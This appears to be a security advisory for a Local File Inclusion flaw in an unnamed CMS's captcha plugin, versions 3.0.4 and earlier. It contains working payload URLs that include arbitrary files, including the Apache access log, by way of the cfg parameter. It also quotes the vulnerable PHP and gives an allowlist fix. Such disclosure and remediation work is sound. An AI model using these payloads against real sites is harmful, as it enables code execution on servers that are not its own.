Description
Brief of this vulnerability
There is a Local File Inclusion vulnerability in the CMS that an attacker can exploit to execute PHP code.
Test Environment
Apache/2.4.39 (Windows10)
PHP 5.4.45-2+mysql 5.7.26
Affected version
<=3.0.4
Payload
http://127.0.0.1/plugins/captcha/crypt/cryptographp.inc.php?sn=exp&exp=1&cfg=filename
We can create phpinfo.txt in the web directory with the content <?php phpinfo();?> and include it:
http://127.0.0.1/plugins/captcha/crypt/cryptographp.inc.php?sn=exp&exp=1&cfg=I:\phpstudy_pro\www\phpinfo.txt
Alternatively, the Apache access log can be included:
http://127.0.0.1/plugins/captcha/crypt/cryptographp.inc.php?sn=exp&exp=1&cfg=I:\phpstudy_pro\Extensions\Apache2.4.39\logs\access.log

Reason of This Vulnerability
The value of the cfg GET parameter is taken directly from the request and passed to include() without any validation, which causes the vulnerability. Vulnerable file:
plugins\captcha\crypt\cryptographp.inc.php
# ..\plugins\captcha\crypt\cryptographp.inc.php (vulnerable code as shipped)
<?php
// Error image is served only when the cookie test fails AND the parameter named by sn is empty
if (( ! isset($_COOKIE['cryptcookietest'])) and ($_GET[$_GET['sn']] == "")) {
    header("Content-type: image/png");
    readfile('images/erreur3.png');
    exit;
}
if ($_GET[$_GET['sn']] == "") { unset ($_GET['sn']); }
session_start();
// Takes only the configuration files in the same directory
// (comment is wrong: cfg is not restricted to the plugin directory at all)
if ($_GET['cfg'] ) { $_SESSION['configfile']=$_GET['cfg']; } else { $_SESSION['configfile'] = "cryptographp.cfg.php"; }
// Attacker-controlled path reaches include() unchanged: Local File Inclusion
include($_SESSION['configfile']);
As long as sn is set and the parameter it names is not empty (for example sn=exp&exp=1), both if checks are skipped. The cfg value is then assigned directly to $_SESSION['configfile'] and passed to include(), which is the vulnerability.
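As an added example (not the plugin's own code), the configuration-file selection above rewritten so that only an explicitly allowlisted file inside the plugin directory can ever reach include(); the allowlist contents and the 400 response are assumptions for illustration, and the code stays compatible with the PHP 5.4 test environment:

```php
<?php
// Added example, not the plugin's own code: hardened replacement for the
// cfg handling in cryptographp.inc.php. Allowlist and error handling are
// illustrative assumptions.

// Every loadable configuration file is named here explicitly and must live
// in the plugin directory. No request value is ever used as a path on its
// own, so an absolute path to a text file or to the Apache access log can
// never be handed to include().
$allowedConfigs = array('cryptographp.cfg.php');
$defaultConfig  = 'cryptographp.cfg.php';

function resolve_config_file($requested, array $allowed, $default)
{
    $dir = realpath(dirname(__FILE__));
    if (!is_string($requested) || $requested === '') {
        $name = $default;            // missing, empty or array-valued cfg
    } else {
        // basename() discards any directory part, so "..\" sequences and
        // absolute paths collapse to a bare file name before the check.
        $name = basename($requested);
    }
    if (!in_array($name, $allowed, true)) {
        // Unknown name: refuse rather than silently loading something else.
        http_response_code(400);
        exit('invalid configuration file');
    }
    $path = realpath($dir . DIRECTORY_SEPARATOR . $name);
    // Belt and braces: the resolved file must exist and still sit under $dir.
    if ($path === false || strpos($path, $dir . DIRECTORY_SEPARATOR) !== 0) {
        http_response_code(400);
        exit('invalid configuration file');
    }
    return $path;
}

session_start();
$requested = isset($_GET['cfg']) ? $_GET['cfg'] : null;
$_SESSION['configfile'] = resolve_config_file($requested, $allowedConfigs, $defaultConfig);
include $_SESSION['configfile'];
```

With this change the two payloads above are rejected with a 400, and a request for cfg=cryptographp.cfg.php still loads the plugin's own configuration.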


